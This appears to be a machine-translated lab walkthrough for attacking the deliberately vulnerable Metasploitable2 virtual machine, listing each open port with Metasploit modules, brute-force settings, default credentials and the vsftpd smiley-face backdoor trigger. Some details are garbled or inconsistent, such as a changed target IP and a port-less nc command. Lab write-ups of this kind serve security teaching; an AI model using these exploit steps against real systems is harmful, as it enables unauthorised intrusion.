Metasploitable2 Penetration Testing Details
Metasploitable2 target machine introduction:
Metasploitable2 virtual system is a specially made ubuntu operating system, which is designed as a security tool to test and demonstrate common vulnerability attacks. This version of the virtual system is compatible with VMware. When the virtual system is started, use the username: msfadminand password msfadminto log in, which is suitable for learning network security novice learning
Metasploitable2 target machine download:
Download link: Link: https://pan.baidu.com/s/1I1QDeitaZR7EuluY8-0j5Q
Extraction code: 6666
Metasploitable2 target machine installation:
After downloading, unzip the installation package and try VMware.
Metasploitable2 target machine vulnerability details:
Penetration machine: kali IP: 172.16.5.42 Target machine IP: 172.16.5.17
Vulnerability list:
| port/service | port/service |
|---|---|
| 21 / weak password | 445 / tested |
| 22 / weak password | 512 / rlogin |
| 23 / weak password | 512 / rlogin |
| 25 - | 514 / rlogin |
| 53 - | 1099 / java_rmi_server |
| 80 - php_cgi | 154 msfable backdoor |
| 111 - | 2049/NFS Share Vulnerability |
| 139 / smb | 2121 - |
| 3306 / empty password | 3632 / distcc_exec |
| 5432 / postgresql | 5900 / VNC |
| 6000 - | 6667 / unreal_ircd |
| 6697 / unreal_ircd | 8009 |
| 8180 / tomcat | 8787 / drb_remote_codeexec |
First of all, let's take a look at port 21. The version is 2.3.4. It can be thought that the smiley face vulnerability backdoor msf uses scripts to run.
You can also manually activate the backdoor vulnerability. If you add (smiley face symbol) after the username sent “:)”, this version of the backdoor will open a listening shell on port 6200. We can confirm through telnet or automatically attack through the attack module on metasploit.
ftp 172.16.5.17 Here telnet can also activate the smiley face
Just enter a Root for the account:)
Password: Just enter a 6200 backdoor port that has been created
Nc connection: nc 172.16.5.17
Port 22: direct brute force cracking
Search ssh_login 搜索模块
Use auxiliary/scanner/ssh/ssh_login 使用模块
Set RHOST 172.16.5.198 设置目标地址
Set USER_FILE /root/0.txt 设置用户字典路径
Set PASS_FILE /root/0.txt 设置字典密码路径
Set THREADS 100 设置线程是100
Run 开跑
Port 23 (telnet):
Try brute force cracking as usual, username and password are: msfadmin
Use netlnet to log in:
Port 80: There are quite a lot of loopholes here Visit phpinfo().php and find a loophole in 2012
The server API runs in CGI mode, which has a loophole in PHP - Cgi parameter injection
139 and 445 are both Smb service types, shared services.
use auxiliary/scanner/smb/smb_enumshares
Using a script: use auxiliary/admin/smb/samba_symlink_traversal
Port 1099 is a Java deserialization command execution vulnerability, you can see that getshell
Principle: There are security holes in the default configuration of the RMI registry and RMI activation service of Java RMI Server, which can be exploited to cause
Use: use exploit/multi/misc/java_rmi_server
After setting the parameters and executing, there will be a session and then switch the session.
Port 1524:
An ancient and surprising “ingreslock”backdoor exists on a small number of servers, listening on port 1524. It has been frequently used to compromise an exposed server over the past decade. It's so easy to use.
3306 The default port of the database, since the remote connection is running, directly blast, the account root password is empty and then log in
Modules used: use auxiliary/scanner/mysql/mysql_login
3632 distccd service, remote command execution vulnerability, direct exp
Use the module:use exploit/unix/misc/distcc_exec
Port 5432, postgresq blasting
Port 5900 vnc service, vnc service consists of two parts, one is the service, the other is the client, we will blast
Use module blasting:use auxiliary/scanner/vnc/vnc_login
6667 port 6697 IRC service, there is a backdoor vulnerability in this version of IRC service, getshell directly after exp
Use the module:use exploit/unix/irc/unreal_ircd_3281_backdoor
Port 8180: brute force account password: tomcat; tomcat
port 8787 drb service, there is a remote code execution vulnerability
Use the module:use exploit/linux/misc/drb_remote_codeexec
Metasploitable2 target penetration summary:
Since then, the approximate vulnerabilities have basically been written. This target drone vulnerability is suitable for novice practice. Some vulnerabilities may not be tested and some problems have not been discovered or discovered. I hope that everyone will abide by the network security law while learning technology. Everyone has helped, and I have to do more, thank you for your support!